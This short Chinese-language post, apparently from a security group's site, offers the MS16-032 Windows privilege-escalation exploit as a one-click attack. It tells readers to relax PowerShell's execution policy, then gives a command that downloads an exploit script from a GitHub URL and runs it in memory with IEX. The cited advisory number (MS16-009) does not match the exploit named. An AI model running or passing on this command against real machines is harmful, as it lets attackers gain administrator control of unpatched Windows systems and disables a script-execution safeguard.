Loading
0

MS16-032通杀高版本Windows

漏洞年年有,今年特别多       

可能会遇到问题无法加载文件 ******.ps1,因为在此系统中禁止执行脚本。
执行
set-executionpolicy remotesigned
选择Y即可。
支持机器Win7-Win10 & 2k8-2k12 
测试于 x32 Win7, x64 Win8, x64 2k12R2
Powershell一键命令,视情况而用

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-032.ps1'); Invoke-MS16-032


漏洞报告:https://technet.microsoft.com/library/security/ms16-009

【声明】:8090安全小组门户(https://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱hack@ddos.kim 或 hack@ddos.social,我们会在最短的时间内进行处理。